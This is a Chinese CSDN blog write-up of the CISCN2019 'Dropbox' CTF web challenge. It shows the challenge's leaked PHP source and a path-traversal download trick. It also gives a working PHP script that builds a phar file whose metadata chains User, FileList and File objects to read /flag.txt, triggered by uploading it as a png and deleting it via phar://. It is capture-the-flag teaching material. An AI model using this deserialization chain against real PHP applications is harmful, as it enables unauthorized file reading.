[CISCN2019 华北赛区 Day1 Web1]Dropbox (phar的运用)

最新推荐文章于 2022-04-23 20:23:32 发布
最新推荐文章于 2022-04-23 20:23:32 发布
阅读量312 收藏 1
点赞数 4
分类专栏: web 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31028197/article/details/117630612
版权
本文介绍了在CISCN2019华北赛区Day1 Web1题目的解决过程,涉及到PHP phar文件的特性。通过利用phar文件的序列化和反序列化功能,绕过过滤实现目录穿越,最终读取到flag。文中详细分析了攻击链的构造,包括如何调用`open`、`readFile`等函数,以及如何利用魔法方法完成攻击。
摘要由CSDN通过智能技术生成

2018年的Black Hat上安全研究员Sam Thomas分享了议题It’s a PHP unserialization vulnerability Jim, but not as we know it,利用phar文件会以序列化形式储存用户自定义的meta-data并在导入的时候自动进行反序列化的特性,拓宽了php反序列化漏洞的攻击面,可以在不存在unserialize()的情况下进行反序列化操作,并且phar文件的识别是依靠它特定的文件头,所以它可以修改为任意后缀从而绕过部分的过滤

ps.2018年提出的议题,2019年就出成题目了,CTF和前沿研究还是很紧密的。

进入题目看见的是登录注册功能,先注册一个账户登入发现是一个云盘功能,可以上传下载删除图片。在测试功能后发现,下载部分存在目录穿越,但是尝试直接获取flag无果,看到源码发现有过滤
在这里插入图片描述
lena.png修改为../../download.php获取到download.php的源代码,同样方法获取delete.php和index.php
在这里插入图片描述

<?php
session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}

if (!isset($_POST['filename'])) {
    die();
}

include "class.php";

chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename)) {
    $file->detele();
    Header("Content-type: application/json");
    $response = array("success" => true, "error" => "");
    echo json_encode($response);
} else {
    Header("Content-type: application/json");
    $response = array("success" => false, "error" => "File not exist");
    echo json_encode($response);
}
?>

发现有包含class.php,下载class.php

<?php
error_reporting(0);
$dbaddr = "127.0.0.1";
$dbuser = "root";
$dbpass = "root";
$dbname = "dropbox";
$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);

class User {
    public $db;

    public function __construct() {
        global $db;
        $this->db = $db;
    }

    public function user_exist($username) {
        $stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->store_result();
        $count = $stmt->num_rows;
        if ($count === 0) {
            return false;
        }
        return true;
    }

    public function add_user($username, $password) {
        if ($this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
        $stmt->bind_param("ss", $username, $password);
        $stmt->execute();
        return true;
    }

    public function verify_user($username, $password) {
        if (!$this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->bind_result($expect);
        $stmt->fetch();
        if (isset($expect) && $expect === $password) {
            return true;
        }
        return false;
    }

    public function __destruct() {
        $this->db->close();
    }
}

class FileList {
    private $files;
    private $results;
    private $funcs;

    public function __construct($path) {
        $this->files = array();
        $this->results = array();
        $this->funcs = array();
        $filenames = scandir($path);

        $key = array_search(".", $filenames);
        unset($filenames[$key]);
        $key = array_search("..", $filenames);
        unset($filenames[$key]);

        foreach ($filenames as $filename) {
            $file = new File();
            $file->open($path . $filename);
            array_push($this->files, $file);
            $this->results[$file->name()] = array();
        }
    }

    public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }

    public function __destruct() {
        $table = '<div id="container" class="container"><div class="table-responsive"><table id="table" class="table table-bordered table-hover sm-font">';
        $table .= '<thead><tr>';
        foreach ($this->funcs as $func) {
            $table .= '<th scope="col" class="text-center">' . htmlentities($func) . '</th>';
        }
        $table .= '<th scope="col" class="text-center">Opt</th>';
        $table .= '</thead><tbody>';
        foreach ($this->results as $filename => $result) {
            $table .= '<tr>';
            foreach ($result as $func => $value) {
                $table .= '<td class="text-center">' . htmlentities($value) . '</td>';
            }
            $table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">下载</a> / <a href="#" class="delete">删除</a></td>';
            $table .= '</tr>';
        }
        echo $table;
    }
}

class File {
    public $filename;

    public function open($filename) {
        $this->filename = $filename;
        if (file_exists($filename) && !is_dir($filename)) {
            return true;
        } else {
            return false;
        }
    }

    public function name() {
        return basename($this->filename);
    }

    public function size() {
        $size = filesize($this->filename);
        $units = array(' B', ' KB', ' MB', ' GB', ' TB');
        for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024;
        return round($size, 2).$units[$i];
    }

    public function detele() {
        unlink($this->filename);
    }

    public function close() {
        return file_get_contents($this->filename);
    }
}
?>

因为在download和delete中都包含file的open函数,到class中查看发现open函数的实现

public function open($filename) {
        $this->filename = $filename;
        if (file_exists($filename) && !is_dir($filename)) {
            return true;
        } else {
            return false;
        }
    }

存在file_existsis_dir函数,它们可以对phar文件进行反序列化操作且没有任何过滤,我们就可以尝试构造调用链了。
仔细观察发现File类中的close()函数存在file_get_contents($this->filename)可以进行文件读取,所以我们调用的终点就是这个函数,之后发现User类中有__destruct()可以调用close(),但是成功调用后没有办法回显,又看了一下FileList类,发现存在__call()魔法方法,所以大致的调用链可以构造为
先是User调用__destruct(),使dbFileList类,调用FileListclose(),但是FileList不存在close()函数,所以调用__call()方法,使file为一个File类的数组,从而调用File类close(),当$filename为flag的文件名时就可以读取到flag,再经过FileList__destruct()来回显

payload如下

<?php
class User {
  public $db;
}
class File {
    public $filename = '/flag.txt';
}
class FileList{
  private $files;
  public function __construct(){
    $this -> files = array(new File());
  } 
}
$a = new User();
$a->db = new FileList();
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('xxx.txt', 'xxx');
$phar->setStub('<?php __HALT_COMPILER(); ? >');
$phar->setMetadata($a);
$phar->stopBuffering();
?>

因为在download.php中存在ini_set("open_basedir", getcwd() . ":/etc:/tmp");导致只能访问/etc和/tmp文件夹,所以使用删除功能来获取flag
生成一个test.phar文件,上传拦截后修改后缀为png图片格式,上传后,点删除,抓包修改删除文件名为filename=phar://test.png,在返回信息中获取到flag

LDAx
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
[CISCN2019 华北赛区 Day1 Web1]Dropbox
a1262443306的博客
06-08 187
反序列化[CISCN2019 华北赛区 Day1 Web1]Dropbox 1.注册登录后页面如下 2.猜测是文件上传,多测尝试以后发现后端直接讲我们的文件后缀进行了改写,无法执行脚本 3.题目提示了一个phar,应该是利用phar协议读取文件,触发反序列化读写flag文件。然而,想用phar协议读写文件需要满足这几个条件。 phar文件要能够上传到服务器端。 要有可用的魔术方法作为“跳板”。 文件操作函数的参数可控,且:、/、phar等特殊字符没有被过滤。 ​ 注意: 所指的phar文件不一定需要文件
NO.3-5 [CISCN2019 华北赛区 Day1 Web1]Dropbox
nigo134的博客
08-06 311
知识点轰炸 1.1 open_basedir 在in_set这个函数中,可以设置php的一些配置,其中就包括open_basedir ,用来限制当前程序可以访问的目录。后来问了一下朱师傅,了解到:它是可以访问设置目录下的所有下级目录。 若"open_basedir = /dir/user", 那么目录 “/dir/user” 和 “/dir/other"都是可以访问的。所以如果要将访问限制在仅为指定的目录,请用斜线结束路径名。”."可代表当前目录,open_basedir也可以同时设置多个目录,在Win
CISCN2019_华北赛区_Day1_Web1-Dropbox
抒情诗
10-23 392
好长时间没做web了,web狗太难了 首先得检讨一下,我竟然将近三天没做web题目了,这这这还是一个web狗应该做的吗?反思一下呜呜呜。。。 phar反序列化 什么是phar反序列化呢? 下面的文章可能会有点帮助来自jianshu 按照我的理解来说呢,就是把危险的文件上传到服务器?然后借助某些功能与危险函数实现危险的操作,太笼统了。具体来说呢就是php文件系统中很大一部分的函数在通过phar://解析时,存在着对meta-data(在这里<meta-data>区域面搞反序列化的pop链)反序列化
[CISCN2019 华北赛区 Day1 Web1]Dropboxphar反序列化)
qq_45699846的博客
03-11 2499
[CISCN2019 华北赛区 Day1 Web1]Dropboxphar反序列化)
利用PHAR协议进行PHP反序列化攻击1
08-03
在某些网络安全竞赛(如[CISCN2019华北赛区 Day1 Web1]Dropbox)中,攻击者可能利用PHAR反序列化漏洞来实现文件读取或执行其他操作。例如,通过上传一个伪装成图片的PHAR文件,然后更改其后缀,使得PHP尝试解析它。...
draw.io-21.6.1-windows-installer
最新发布
07-07
《draw.io-21.6.1-windows-installer:图形绘制工具在Windows平台的应用与实践》 draw.io是一款流行的开源在线绘图工具,专为创建流程图、UML图、网络拓扑图、思维导图等多种图形而设计。其最新版本21.6.1针对...
现场签证单95287共1页.pdf.zip
12-01
很抱歉,根据您给出的信息,"现场签证单95287共1页.pdf.zip" 和 "赚钱项目" 并不直接关联到IT行业的具体知识点。"现场签证单"通常涉及建筑行业或工程项目管理,而"赚钱项目"则可能是指各种商业计划或投资机会,这些...
0x9E2A83C1_0x9E2A83C1_
10-02
1. **Download(下载)**: 这是互联网服务中常见的功能,允许用户从服务器获取数据或文件到他们的本地设备。实现这一功能通常需要服务器端的文件存储和传输协议,如HTTP或FTP。下载管理器可以优化这一过程,提供断点...
node_dropbox:Assign1 - Nodejs Dropbox 项目
06-08
Assign1 - Nodejs Dropbox 项目 这是一个基本的 Dropbox 克隆,用于跨多个远程文件夹同步文件。 耗时:15小时 所需功能 客户端可以发出 GET 请求以获取文件或目录内容 - 完成客户端可以发出 HEAD 请求以仅获取 GET...
[CISCN2019 华北赛区 Day1 Web1]Dropbox详解
SHININGENDING的博客
04-23 1957
[CISCN2019 华北赛区 Day1 Web1]Dropbox 一、知识点:信息搜集,Phar反序列化 phar知识点分析 phar文件的结构主要分为四个部分: stub phar文件的表示,类似于gif文件的GIF89a,以 xxx<?php xxx;__HALT__COMPILER();?>为固定形式,前面内容可以变,点必须以__HALT__COMPILER();?>结尾。 2. a mainfest describing the contents 该部分是phar...
[ciscn2019 华北赛区 day1 web1]dropbox
06-06
这是一道Web安全题目,要求我们通过访问网站,获取到flag。 题目中给出了一个网站地址,我们可以直接访问该网站。进入网站后,我们可以看到一个登录界面,要求我们输入用户名和密码。 我们可以尝试一些常见的...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值